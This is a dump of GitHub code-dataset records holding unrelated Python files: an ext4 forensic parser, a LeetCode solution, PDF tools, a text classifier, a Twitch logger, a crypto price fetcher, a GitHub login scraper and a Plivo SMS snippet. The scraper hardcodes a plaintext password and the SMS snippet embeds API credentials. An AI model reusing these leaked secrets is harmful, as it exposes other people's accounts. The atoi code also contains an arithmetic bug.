(block_group.bg_inode_table_hi << 32) | block_group.bg_inode_table_lo\n else:\n table_block = block_group.bg_inode_table_lo\n\n offset = table_block * self.extfs.block_size + index * self.extfs.sb.s_inode_size\n self.extfs.fh.seek(offset)\n return c_ext.ext4_inode(self.extfs.fh)\n\n @property\n def inode(self) -> Instance:\n if not self._inode:\n self._inode = self._read_inode()\n return self._inode\n\n @property\n def size(self) -> int:\n if not self._size:\n self._size = (self.inode.i_size_high << 32) + self.inode.i_size_lo\n return self._size\n\n @property\n def filetype(self) -> int:\n if not self._filetype:\n self._filetype = stat.S_IFMT(self.inode.i_mode)\n return self._filetype\n\n @property\n def link(self) -> str:\n if self.filetype != stat.S_IFLNK:\n raise NotASymlinkError(f\"{self!r} is not a symlink\")\n\n if not self._link:\n self._link = self.open().read().decode(errors=\"surrogateescape\")\n return self._link\n\n @property\n def link_inode(self) -> INode:\n if not self._link_inode:\n # Relative lookups work because . and .. are actual directory entries\n link = self.link\n if link.startswith(\"/\"):\n relnode = None\n else:\n relnode = self.parent\n self._link_inode = self.extfs.get(self.link, relnode)\n return self._link_inode\n\n @property\n def xattr(self) -> list[XAttr]:\n if not self._xattr:\n xattr = []\n\n if self.inode.i_extra.strip(b\"\\x00\"):\n buf = io.BytesIO(self.inode.i_extra)\n hdr = c_ext.ext4_xattr_ibody_header(buf)\n if hdr.h_magic != c_ext.EXT4_XATTR_MAGIC:\n raise Error(\"Invalid xattr magic value\")\n\n xattr.extend(_iter_xattr(self, buf, len(self.inode.i_extra), 4))\n\n if self.inode.i_file_acl_lo:\n block = (self.inode.i_file_acl_high << 32) | self.inode.i_file_acl_lo\n block_offset = block * self.extfs.block_size\n\n buf = RangeStream(self.extfs.fh, block_offset, self.extfs.block_size)\n hdr = c_ext.ext4_xattr_header(buf)\n if hdr.h_magic != c_ext.EXT4_XATTR_MAGIC:\n raise Error(\"Invalid xattr magic value\")\n\n xattr.extend(_iter_xattr(self, buf, buf.size))\n\n self._xattr = xattr\n return self._xattr\n\n @property\n def atime(self) -> datetime:\n return ts.from_unix_ns(self.atime_ns)\n\n @property\n def atime_ns(self) -> int:\n time = self.inode.i_atime\n time_extra = self.inode.i_atime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def mtime(self) -> datetime:\n return ts.from_unix_ns(self.mtime_ns)\n\n @property\n def mtime_ns(self) -> int:\n time = self.inode.i_mtime\n time_extra = self.inode.i_mtime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def ctime(self) -> datetime:\n return ts.from_unix_ns(self.ctime_ns)\n\n @property\n def ctime_ns(self) -> int:\n time = self.inode.i_ctime\n time_extra = self.inode.i_ctime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def dtime(self) -> datetime:\n return ts.from_unix(self.inode.i_dtime)\n\n @property\n def crtime(self) -> Optional[datetime]:\n time_ns = self.crtime_ns\n if time_ns is None:\n return None\n return ts.from_unix_ns(time_ns)\n\n @property\n def crtime_ns(self) -> Optional[int]:\n if self.extfs.sb.s_inode_size <= 128:\n return None\n\n time = self.inode.i_crtime\n time_extra = self.inode.i_crtime_extra\n\n return _parse_ns_ts(time, time_extra)\n\n def listdir(self) -> dict[str, INode]:\n if not self._dirlist:\n self._dirlist = {node.filename: node for node in self.iterdir()}\n return self._dirlist\n\n dirlist = listdir\n\n def iterdir(self) -> Iterator[INode]:\n if self.filetype != stat.S_IFDIR:\n raise NotADirectoryError(f\"{self!r} is not a directory\")\n\n buf = self.open()\n offset = 0\n\n while offset < self.size - 12:\n direntry = self.extfs._dirtype(buf)\n\n if direntry.rec_len == 0:\n log.critical(\"Zero-length directory entry in %s (offset 0x%x)\", self, offset)\n return\n\n # Sanity check if the direntry is valid\n if 0 < direntry.inode < self.extfs.sb.s_inodes_count:\n fname = buf.read(direntry.name_len).decode(errors=\"surrogateescape\")\n ftype = direntry.file_type if self.extfs._dirtype == c_ext.ext2_dir_entry_2 else None\n\n if ftype:\n ftype = FILETYPES[ftype]\n\n yield self.extfs.get_inode(direntry.inode, fname, ftype, parent=self, lazy=True)\n\n offset += direntry.rec_len\n buf.seek(offset)\n\n def dataruns(self) -> list[tuple[Optional[int], int]]:\n if not self._runlist:\n expected_runs = (self.size + self.extfs.block_size - 1) // self.extfs.block_size\n\n if self.inode.i_flags & c_ext.EXT4_EXTENTS_FL:\n buf = io.BytesIO(self.inode.i_block)\n\n runs = []\n run_offset = 0\n\n for extent in _parse_extents(self, buf):\n # Account for uninitialized extents\n if extent.ee_len > 0x8000:\n uninitialized_gap = extent.ee_len - 0x8000\n runs.append((None, uninitialized_gap))\n run_offset += uninitialized_gap\n continue\n\n # Account for sparse gaps\n if extent.ee_block != run_offset:\n sparse_gap = extent.ee_block - run_offset\n runs.append((None, sparse_gap))\n run_offset += sparse_gap\n\n runs.append(((extent.ee_start_hi << 32) | extent.ee_start_lo, extent.ee_len))\n run_offset += extent.ee_len\n\n if run_offset < expected_runs:\n runs.append((None, expected_runs - run_offset))\n\n self._runlist = runs\n else:\n i_blocks = c_ext.uint32[15](self.inode.i_block)\n num_blocks = (self.size + self.extfs.block_size - 1) // self.extfs.block_size\n num_direct_blocks = min(num_blocks, c_ext.EXT2_NDIR_BLOCKS)\n\n blocks = i_blocks[:num_direct_blocks]\n num_blocks -= num_direct_blocks\n\n if num_blocks > 0:\n for level in range(c_ext.EXT2_NIND_BLOCKS):\n indirect_offset = i_blocks[num_direct_blocks + level]\n parsed_blocks = _parse_indirect(self, indirect_offset, num_blocks, level + 1)\n num_blocks -= len(parsed_blocks)\n blocks.extend(parsed_blocks)\n\n if num_blocks == 0:\n break\n\n runs = []\n if blocks:\n run_offset = None\n run_size = 1\n\n for block in blocks:\n if run_offset is None:\n run_offset = block\n continue\n\n if block == run_offset + run_size:\n run_size += 1\n else:\n if run_offset == 0:\n runs.append((None, run_size))\n else:\n runs.append((run_offset, run_size))\n run_offset = block\n run_size = 1\n\n runs.append((run_offset, run_size))\n\n self._runlist = runs\n\n return self._runlist\n\n def open(self) -> BinaryIO:\n if self.inode.i_flags & c_ext.EXT4_INLINE_DATA_FL or self.filetype == stat.S_IFLNK and self.size < 60:\n buf = io.BytesIO(memoryview(self.inode.i_block)[: self.size])\n # Need to add a size attribute to maintain compatibility with dissect streams\n buf.size = self.size\n return buf\n return RunlistStream(self.extfs.fh, self.dataruns(), self.size, self.extfs.block_size)\n\n\nclass XAttr:\n def __init__(self, extfs: ExtFS, inode: INode, entry: Instance, value: bytes):\n self.extfs = extfs\n self.inode = inode\n self.entry = entry\n\n self.prefix = XATTR_PREFIX_MAP.get(entry.e_name_index, \"unknown_prefix\")\n self._name = XATTR_NAME_MAP.get(entry.e_name_index, entry.e_name.decode(errors=\"surrogateescape\"))\n self.name = self.prefix + self._name\n self.value = value\n\n def __repr__(self) -> str:\n return f\"\"\n\n\ndef _parse_indirect(inode: INode, offset: int, num_blocks: int, level: int) -> list[int]:\n offsets_per_block = inode.extfs.block_size // 4\n\n if level == 1:\n read_blocks = min(num_blocks, offsets_per_block)\n inode.extfs.fh.seek(offset * inode.extfs.block_size)\n return c_ext.uint32[read_blocks](inode.extfs.fh)\n else:\n blocks = []\n\n max_level_blocks = offsets_per_block**level\n blocks_per_nest = max_level_blocks // offsets_per_block\n read_blocks = (num_blocks + blocks_per_nest - 1) // blocks_per_nest\n read_blocks = min(read_blocks, offsets_per_block)\n\n inode.extfs.fh.seek(offset * inode.extfs.block_size)\n for addr in c_ext.uint32[read_blocks](inode.extfs.fh):\n parsed_blocks = _parse_indirect(inode, addr, num_blocks, level - 1)\n num_blocks -= len(parsed_blocks)\n blocks.extend(parsed_blocks)\n\n return blocks\n\n\ndef _parse_extents(inode: INode, buf: bytes) -> Iterator[Instance]:\n extent_header = c_ext.ext4_extent_header(buf)\n\n if extent_header.eh_magic != 0xF30A:\n raise Error(\"Invalid extent_header magic\")\n\n if extent_header.eh_depth == 0:\n for _ in range(extent_header.eh_entries):\n extent = c_ext.ext4_extent(buf)\n yield extent\n else:\n for _ in range(extent_header.eh_entries):\n idx = c_ext.ext4_extent_idx(buf)\n child = (idx.ei_leaf_hi << 32) | idx.ei_leaf_lo\n\n fh = inode.extfs.fh\n fh.seek(child * inode.extfs.block_size)\n blockbuf = io.BytesIO(fh.read(inode.extfs.block_size))\n yield from _parse_extents(inode, blockbuf)\n\n\ndef _iter_xattr(inode: INode, buf: BinaryIO, end: int, value_offset: int = 0) -> Iterator[XAttr]:\n offset = buf.tell()\n while True:\n try:\n if offset > end:\n break\n\n buf.seek(offset)\n entry = c_ext.ext4_xattr_entry(buf)\n\n if (entry.e_name_len, entry.e_name_index, entry.e_value_offs) == (0, 0, 0):\n break\n\n if entry.e_value_inum:\n value = inode.extfs.get_inode(entry.e_value_inum).open().read(entry.e_value_size)\n else:\n buf.seek(value_offset + entry.e_value_offs)\n value = buf.read(entry.e_value_size)\n\n yield XAttr(inode.extfs, inode, entry, value)\n\n offset += (len(entry) + c_ext.EXT4_XATTR_ROUND) & (~c_ext.EXT4_XATTR_ROUND & 0xFFFFFFFF)\n except EOFError:\n break\n\n\ndef _parse_ns_ts(time: int, time_extra: int) -> int:\n # The low 2 bits of time_extra are used to extend the time field\n # The remaining 30 bits are nanoseconds\n time |= (time_extra & 0b11) << 32\n ns = time_extra >> 2\n\n return (time * 1000000000) + ns\n","repo_name":"fox-it/dissect.extfs","sub_path":"dissect/extfs/extfs.py","file_name":"extfs.py","file_ext":"py","file_size_in_byte":19098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26464759193","text":"class Solution:\n def myAtoi(self, s: str) -> int:\n # 52ms 42%\n idx = 0\n while idx < len(s) and s[idx] == ' ':\n idx += 1\n plus = 0\n minus = 0\n while idx < len(s) and (s[idx] == '+' or s[idx] == '-'):\n if s[idx] == '+':\n plus += 1\n if s[idx] == '-':\n minus += 1\n idx += 1\n if (plus and minus) or (2 <= plus) or (2 <= minus):\n return 0\n ans = 0\n while idx < len(s) and '0' <= s[idx] <= '9':\n if ans <= -214748375:\n return -2147483648\n if 214748365 <= ans:\n return 2147483647\n ans *= 10\n ans += int(s[idx])\n idx += 1\n if minus:\n ans *= -1\n if -2 ** 31 <= ans <= 2 ** 31 -1:\n return ans\n if ans < -2 * 31:\n return -2147483648\n if 2 ** 31 <= ans:\n return 2147483647\n return 0\n \nprint(Solution().myAtoi(\"42\"))\n","repo_name":"kdm111/public_self_study_note","sub_path":"LeetCode_Algorithm/8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3200329238","text":"from pandas import DataFrame\nfrom scapy.layers.inet import UDP\n\nfrom mice_base.fe_types import Pkt, FlowID, Flows\n\nfrom typing import List, Set\n\nSIP = 0\nDIP = 1\nSPORT = 2\nDPORT = 3\nLENGTH = 4\n\n\ndef match_forward(flow, clients, proxies) -> bool:\n return flow[SIP] in clients and flow[DIP] in proxies\n\n\ndef match_backward(flow, clients, proxies) -> bool:\n return flow[DIP] in clients and flow[SIP] in proxies\n\n\ndef is_fwd(fid: FlowID) -> bool:\n return fid[2] > fid[3]\n\n\ndef is_bwd(fid: FlowID) -> bool:\n return fid[3] > fid[2]\n\n\ndef label_forward(\n fids: List[FlowID], fwd_idxs: Set[int], clients: List[str], proxies: List[str]\n) -> DataFrame:\n fwd_labels = [idx in fwd_idxs for idx in range(len(fids))]\n flow_labels = [match_forward(fid, clients, proxies) for fid in fids]\n return DataFrame(\n zip(fwd_labels, flow_labels, fids),\n columns=[\"right_direction\", \"label\", \"flowid\"],\n )\n\n\ndef label_backward(\n fids: List[FlowID], bwd_idxs: Set[int], clients: List[str], proxies: List[str]\n) -> DataFrame:\n bwd_labels = [idx in bwd_idxs for idx in range(len(fids))]\n flow_labels = [match_backward(fid, clients, proxies) for fid in fids]\n\n return DataFrame(\n zip(bwd_labels, flow_labels, fids),\n columns=[\"right_direction\", \"label\", \"flowid\"],\n )\n\n\ndef label_both(flows: Flows, clients: List[str], proxies: List[str]) -> DataFrame:\n fids = [fid for fid, _ in flows]\n direction_labels = [True for fid in fids]\n flow_labels = [\n match_backward(fid, clients, proxies) or match_forward(fid, clients, proxies)\n for fid in fids\n ]\n\n return DataFrame(\n zip(direction_labels, flow_labels, fids),\n columns=[\"right_direction\", \"label\", \"flowid\"],\n )\n\n\ndef label_snowflake(flows: Flows, clients: List[str], background: List[str]):\n fids = [fid for fid, _ in flows]\n direction_labels = [True] * len(flows)\n flow_labels = [\n bool(\n flow[0].haslayer(UDP)\n and (fid.sip in clients or fid.dip in clients)\n and (fid.sip not in background and fid.dip not in background)\n )\n for fid, flow in flows\n ]\n\n return DataFrame(\n zip(direction_labels, flow_labels, fids),\n columns=[\"right_direction\", \"label\", \"flowid\"],\n )\n","repo_name":"tst-paperdice/mice_feature_extraction","sub_path":"labeling.py","file_name":"labeling.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38715963504","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QMainWindow,QFileDialog\n\nclass MyPdf(QMainWindow):\n def __init__(self):\n super(MyPdf, self).__init__()\n print('创建一个pdf对象')\n\n def getfile(self):\n self.fileName, self.filetype = QFileDialog.getOpenFileName(self, \"选择文件\", \"/\", \"PDF Files (*.pdf)\")\n fileinfo = QFileInfo(self.fileName)\n self.file_path = fileinfo.absolutePath()\n if self.file_path != '':\n self.getNumPages()\n\n def getNumPages(self):\n fp_read_file = open(self.fileName, 'rb')\n self.pdf_input = PdfFileReader(fp_read_file) # 将要分割的PDF内容格式话\n self.page_count = self.pdf_input.getNumPages() # 获取PDF页数\n # print(\"该文件共���{}页\".format(page_count)) # 打印页数\n\n def splitpdf(self, split_lists):\n for split_list in split_lists:\n pdf_output = PdfFileWriter() # 实例一个 PDF文件编写器\n for i in range(split_list[0]-1, split_list[1]):\n pdf_output.addPage(self.pdf_input.getPage(i))\n with open(split_list[2], 'wb') as sub_fp:\n pdf_output.write(sub_fp)\n print('拆分文件完成')\n\n def merge(self, file_lists, new_filename):\n merger = PdfFileMerger()\n for file in file_lists: # 从所有文件中选出pdf文件合并\n merger.append(open(file, 'rb'))\n with open(new_filename, 'wb') as fout: # 输出文件为newfile.pdf\n merger.write(fout)\n print('合并文件完成')\n\n","repo_name":"Jianhua-Xie/PDF_tools","sub_path":"MyPdfTools.py","file_name":"MyPdfTools.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20909419610","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# LTAT.01.002 Keeletehnoloogia (2019 kevad)\n# Kodutöö nr 2. Tekstide liigitamine\n\nimport random\nimport os\nimport nltk\nfrom sklearn.naive_bayes import MultinomialNB\nimport estnltk\nfrom nltk.probability import *\nfrom estnltk import Text\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport pandas as pd\nfrom sklearn.model_selection import KFold\n\n# Gensim\nimport gensim\nimport gensim.corpora as corpora\nfrom gensim.utils import simple_preprocess\nfrom gensim.models import CoherenceModel\n\n# Enable logging for gensim - optional\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR)\n\nlabels = [\"www.advent.ee\", \"www.bioneer.ee\", \"www.lapsemure.ee\", \"www.naisteleht.ee\", \"arvamus.postimees.ee\"]\n\n# Korpuse sisselugemine (korpus asub programmifaili kausta alamkaustas)\ndef loaddata(corpus):\n\tcolumns = ['label', 'text']\n\tdata = pd.DataFrame(columns = columns)\n\tfor f in os.listdir(os.getcwd() + \"/\" + corpus):\n\t\tdf = pd.read_csv(os.getcwd() + \"/\" + corpus + \"/\" + f, delimiter=\"\\t\", index_col=None, header=None, names=columns)\n\t\tdata = data.append(df)\n\treturn data\n\ndef bagOfWordsprinter(tegevus):\n\t#Paremaks visualiseerimiseks loodud abimeetod\n\tprint(\"###########################\")\n\tprint(\"BagOfWords\")\n\tif tegevus == 0:\n\t\tprint(\"(ilma lisa parameetriteta)\\n\")\n\tif tegevus == 1:\n\t\tprint(\"(+ lemmad)\\n\")\n\tif tegevus == 2:\n\t\tprint(\"(+ stoppsõnad)\\n\")\n\tif tegevus == 3:\n\t\tprint(\"(+ lemmad + stoppsõnad)\\n\")\n\ndef doc2VecPrinter():\n\t# Paremaks visualiseerimiseks loodud abimeetod\n\tprint(\"###########################\")\n\tprint(\"Doc2Vec \\n\")\n\ndef stopWords(limit, tegevus):\n\t#Kui tahame kasutada stoppsõnu (2 või 3)\n\tif tegevus == 2 or tegevus == 3:\n\t\tcolumns = ['arv','sona','NaN']\n\t\tdata = pd.DataFrame(columns = columns)\n\t\tdf = pd.read_csv(os.getcwd() + \"/\" + \"sagedussonastik_lemmad_kahanev.txt\", delimiter=\" \", index_col=None, header=None, names=columns)\n\t\tdata = data.append(df)\n\t\tarv = 0\n\t\tsonad = []\n\t\tfor i, rida in data.iterrows():\n\t\t\tkat = rida['arv']\n\t\t\tsisu = rida['sona']\n\t\t\tif arv < limit:\n\t\t\t\tsonad.append(sisu)\n\t\t\t\tarv += 1\n\t\t#print(sonad)\n\telse:\n\t\tsonad = []\n\treturn sonad\n\n# Treenimine\ndef bagOfWords(tekstid, stopWordsLimit, tegevus):\n\tglobal globalLemmad\n\tif tegevus == 1 or tegevus == 3:\n\t\tglobalLemmad = True\n\telse:\n\t\tglobalLemmad = False\n\tbagOfWordsprinter(tegevus)\n\tallcounts = {}\n\tcount_vects = {}\n\t#Stopp sõnade list\n\tstopwords = stopWords(stopWordsLimit, tegevus)\n\t#Tulemuste raamatukogu\n\tresults = {'all': []}\n\tfor i, row in tekstid.iterrows():\n\t\ttext = row[\"text\"]\n\t\tlabel = row[\"label\"]\n\t\t#Kui tahame lemmatiseerida(1 või 3)\n\t\tif tegevus == 1 or tegevus == 3:\n\t\t\t#print(\"Kontroll 1\")\n\t\t\ttext = \" \".join(Text(text).lemmas)\n\t\tresults['all'].append(text)\n\t\tif label in results:\n\t\t\tresults[label].append(text)\n\t\telse:\n\t\t\tresults[label] = [text]\n\n\t#Käime üle kõikide tulemuste ja teeme neist vektorid uude raamatukokku\n\tfor i in results.keys():\n\t\tcount_vect = CountVectorizer(stop_words=stopwords)\n\t\tcount_vects[i] = count_vect\n\t\tallcounts[i] = count_vect.fit_transform(results[i])\n\n\t#Arvestame iga sõna esinemise osakaalu\n\ttfidf_transformer = TfidfTransformer()\n\tcount_tfidf = tfidf_transformer.fit_transform(allcounts['all'])\n\t#Õpetame mudelit\n\tmodel = MultinomialNB().fit(count_tfidf, tekstid[\"label\"])\n\treturn [model, count_vects['all'], tfidf_transformer]\n\n\ndef doc2Vec(tekstid):\n\tdoc2VecPrinter()\n\t#Loome gensin jaoks listi\n\tdocuments = []\n\tfor i, rida in tekstid.iterrows():\n\t\t#Loeme sisse tekstid mudeli\n\t\tdocuments.append(gensim.models.doc2vec.TaggedDocument(Text(rida['text']).word_texts, [rida['label']]))\n\t#Treenime doc2vec mudelit (parameetrid votsin nii nagu tunni materjalides olid)\n\tmodel = gensim.models.doc2vec.Doc2Vec(documents, vector_size=100, window=8, min_count=5, workers=4)\n\treturn model\n\n#def kfold(tekstid):\n\t#kfold = KFold(n_splits=2, random_state=None, shuffle=False)\n\t#for a, b in kfold.split(tekstid):\n\n# Ennustamine\ndef predict(mudel, sample):\n\t#Siin on erinevate mudelite ennustamised\n\t# predictDoc2Vec(model, text)\n\t# predictBagOfWords(model, sample)\n\treturn predictBagOfWords(mudel, sample)\n\ndef predictBagOfWords(mudel, sample):\n\t#Praktikumi BagOfWords saadud ennustamine\n\tcount_vect = mudel[1]\n\ttfidf_transformer = mudel[2]\n\tmodels = mudel[0]\n\tglobal globalLemmad\n\tif globalLemmad:\n\t\tsample = \" \".join(Text(sample).lemmas)\n\t#Õpetame mudelit test hulgaga\n\tX_test_counts = count_vect.transform([sample])\n\tX_test_tfidf = tfidf_transformer.transform(X_test_counts)\n\t# Ennustame mudeli põhjal\n\tennustused = models.predict(X_test_tfidf)\n\treturn ennustused[0]\n\ndef predictDoc2Vec(mudel, text):\n\t#Praktikumi gensim materjalist saadud ennustamine\n\tinferred_docvec = mudel.infer_vector(Text(text).word_texts)\n\t#[0][0] mõtte sain kursusekaaslaselt\n\treturn mudel.docvecs.most_similar([inferred_docvec], topn=2)[0][0]\n\n#Learn\ndef learn(corpus):\n\t# doc2Vec(corpus)\n\t# bagOfWords(corpus, stopWordsLimit, tegevus) tegevus:\n\t# N: bagOfWords(corpus, 20, 3)\n\t# 0 (ära kasuta midagi),\n\t# 1 (kasuta lemmasid),\n\t# 2 (kasuta stopp sõnu),\n\t# 3 (kasuta mõlemat)\n\treturn bagOfWords(corpus, 50, 0)\n\n\n# Hindamine (testhulgal)\n# Sisend: treenimisfunktsiooni väljundist saadud mudel ja testkorpuses olev info DataFrame'ina\ndef evaluate(model, testset):\n\tcorrect = 0\n\tfor i, row in testset.iterrows():\n\t\trightAnswer = row['label']\n\t\ttext = row['text']\n\t\tprediction = predict(model, text)\n\t\t#print(rightAnswer, prediction)\n\t\tif rightAnswer == prediction:\n\t\t\tcorrect += 1\n\t\n\tprint(\"Täpsus: {0:}%\".format(100.0 * correct/len(testset)))\n\n\ndef evaluateDoc2Vec(model, testset):\n\tcorrect = 0\n\tfor i, row in testset.iterrows():\n\t\trightAnswer = row['label']\n\t\ttext = row['text']\n\t\tprediction = predictDoc2Vec(model, text)\n\t\t# print(rightAnswer, prediction)\n\t\tif rightAnswer == prediction:\n\t\t\tcorrect += 1\n\n\tprint(\"Täpsus: {0:}%\".format(100.0 * correct / len(testset)))\n\ndef doEverything():\n\t#Käime kõik mudelid läbi\n\t#Sedasi ei pea mitukorda lugema sisse train ja test andmeid\n\ttrainSet = loaddata(\"a_train\")\n\ttestSet = loaddata(\"a_test\")\n\n\tbagOfWordsmodel1 = bagOfWords(trainSet, 50, 0)\n\tevaluate(bagOfWordsmodel1, testSet)\n\n\tbagOfWordsmodel2 = bagOfWords(trainSet, 50, 1)\n\tevaluate(bagOfWordsmodel2, testSet)\n\n\tbagOfWordsmodel3 = bagOfWords(trainSet, 50, 2)\n\tevaluate(bagOfWordsmodel3, testSet)\n\n\tbagOfWordsmodel4 = bagOfWords(trainSet, 50, 3)\n\tevaluate(bagOfWordsmodel4, testSet)\n\n\tdoc2Vecmodel = doc2Vec(trainSet)\n\tevaluateDoc2Vec(doc2Vecmodel, testSet)\n\n#Globaalne muutuja, mis aitab lemmade puhul paremini ennustada meeotdis predictBagOfWords()\nglobalLemmad = False\n\ndoEverything()\n#BagOfWords => 58.3%\n#BagOfWords + lemmad => 57.3%\n#BagOfWords + stoppsõnad => 63%\n#BagOfWords + stoppsõnad + lemmad => 64.3%\n#Word2Vec => 91%\n\n#trainSet = loaddata(\"a_train\")\n#model = learn(trainSet)\n#testSet = loaddata(\"a_test\")\n#evaluate(model, testSet\n","repo_name":"Vossip/language-technology","sub_path":"kodune2/kt_kodutoo_2.py","file_name":"kt_kodutoo_2.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19338220282","text":"import socket\nimport threading\nimport re as regex\nfrom lib.util import getTimeStamp,postWebhook\n\nclass TwitchLogger:\n\tdef __init__(self, channelName:str, WH_TWITCH_URL:str) -> None:\n\t\tself.WH_URL = WH_TWITCH_URL\n\t\tserver = 'irc.chat.twitch.tv'\n\t\tport = 6667\n\t\tnickname = 'justinfan12345'\n\t\tself.irc_socket = socket.socket()\n\t\tself.irc_socket.connect((server, port))\n\t\tself.irc_socket.send(f'PASS {nickname}\\r\\n'.encode('utf-8'))\n\t\tself.irc_socket.send(f'NICK {nickname}\\r\\n'.encode('utf-8'))\n\t\tself.irc_socket.send(f'JOIN #{channelName}\\r\\n'.encode('utf-8'))\n\t\ttwitch_thread = threading.Thread(target=self.listen,daemon=True)\n\t\ttwitch_thread.start()\n\n\tdef listen(self):\n\t\twhile True:\n\t\t\tmessage = self.irc_socket.recv(2048).decode('utf-8')\n\t\t\tping_data = regex.search(r\"PING :tmi\\.twitch\\.tv\", message)\n\t\t\tif ping_data:\n\t\t\t\tself.irc_socket.send(bytes(f\"PONG {ping_data.group(0).split(':')[1]}\\r\\n\", \"UTF-8\"))\n\t\t\t\tcontinue\n\t\t\tif message.startswith(\":tmi.twitch.tv\") or message.startswith(\":justinfan12345\") or message.startswith(\"PING\"):\n\t\t\t\tcontinue\n\t\t\tif \"#owmince\" in message:\n\t\t\t\tusername = message.split(\"!\")[0][1:].strip()\n\t\t\t\ttext = message.split(\"#owmince :\")[1]\n\t\t\t\tdiscordRelativeTimestamp = f\"Logged \"\n\t\t\t\tembed = {\"description\": f\"{text}\",\"title\": f\"{username}\"}\n\t\t\t\twhdata = {\n\t\t\t\t\t\"content\": f\"{discordRelativeTimestamp}\",\n\t\t\t\t\t\"username\": \"HawkEye (Twitch Logs)\",\n\t\t\t\t\t\"embeds\": [embed],\n\t\t\t\t}\n\t\t\t\tpostWebhook(self.WH_URL,whdata)","repo_name":"PixelBot-Dev-Team/hawkeye","sub_path":"loggers/TwitchLogger.py","file_name":"TwitchLogger.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18635239809","text":"#tasks.py\n\nimport ccxt\nimport random\nimport datetime\nfrom PriceAnalysis.models import price, Asset\n\nfrom celery import shared_task\n\n\n\n@shared_task\ndef fetch_coin_price():\n\tbinance = ccxt.binance({\"verbose\": True})\n\n\tfor asset in Asset.objects.all():\n\t\tassetprice = binance.fetch_ticker(asset.ticker)\n\t\tpricechange = assetprice.get(\"percentage\")\n\t\tprint(assetprice)\n\t\tprice.objects.create(\n\t\t\tlast_price=assetprice.get(\"last\"),\n\t\t\tpricechange=pricechange,\n\t\t \tasset = asset,\n\t\t\t)\n\n\"\"\"{'symbol': 'BNB/USDT',\n 'timestamp': 1648205620298,\n 'datetime': '2022-03-25T10:53:40.298Z',\n 'high': 416.6, 'low': 405.0, 'bid': 414.9,\n 'bidVolume': 191.724,\n 'ask': 415.0, 'askVolume': 365.5,\n 'vwap': 412.59700037, 'open': 410.3,\n 'close': 415.0, 'last': 415.0,\n 'previousClose': '410.30000000',\n 'change': 4.7, 'percentage': 1.146,\n 'average': 412.65, 'baseVolume': 555348.894,\n 'quoteVolume': 229135287.8226,\"\"\"\n\n\n","repo_name":"welhoilija/CryptoPortfolio-Django","sub_path":"PriceAnalysis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"71400578718","text":"import requests\nfrom lxml import html\n\n#Encabezados\nheaders = {\n \"user-agent\" : \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36\"\n}\n\n#Página de login de Github\nlogin_form_url = 'https://github.com/login'\n\n#Manejo de sesión\nsession = requests.Session()\n\n#Los requerimientos se hacen a travez de la sesión\nlogin_form_res = session.get(login_form_url, headers=headers)\n\n#Vamos a obtener el token válido del arbol html\nparser = html.fromstring(login_form_res.text)\ntoken_especial = parser.xpath('//input[@name=\"authenticity_token\"]/@value')\n\n#Url que se hace requerimiento POST\nlogin_url = \"https://github.com/session\"\n\n#Parametros que permiten que se inicie sesión\nlogin_data = {\n \"login\": \"JeanCarlo96\",\n \"password\": \"pl33nkmldr7wx\",\n \"commit\": \"Sing in\",\n \"authenticity_token\": token_especial\n}\n\n#Realizamos el requerimiento POST\nsession.post(\n login_url,\n data= login_data,\n headers=headers\n)\n\n#Extracción de datos\n#Url a la que accedo luego de loggearme\ndata_url = 'https://github.com/JeanCarlo96?tab=repositories'\nrespuesta = session.get(\n data_url,\n headers=headers\n)\n\n#Obtenemos el arbol HTML y lo parseamos\nparser = html.fromstring(respuesta.text)\nrepositorios = parser.xpath('//h3[@class=\"wb-break-all\"]/a/text()')\nfor repositorio in repositorios:\n print(repositorio)","repo_name":"JeanCarlo96/FertilizantesBots","sub_path":"WebScraping/nivel_5_github_request.py","file_name":"nivel_5_github_request.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26462026276","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, request, make_response, Response, Flask, flash, redirect, render_template, request, session, abort\nimport plivo\nimport json\nimport jsonify\n\napp = Flask(__name__, static_url_path='')\n\n\n@app.route('/send_sms/')# methods=['POST'])\ndef outbound_sms():\n\n\tfrom_number= request.form.get(\"123456789\")\n\tto_number= request.form.get(\"918827932461\")\n\tcontent= request.form.get(\"text\")\n\n\tclient = plivo.RestClient('MAZWU5OWM4YTK3ZJAXMG', 'NmE5M2I4NDFkYWUxZjNjOTU0NjM4ZjNlNWZhMzQ2')\n\ttry:\n\t\tresp = client.messages.create(\n\t\t\tsrc=from_number, # Sender's phone number with country code\n\t\t\tdst=to_number, # Receiver's phone Number with country 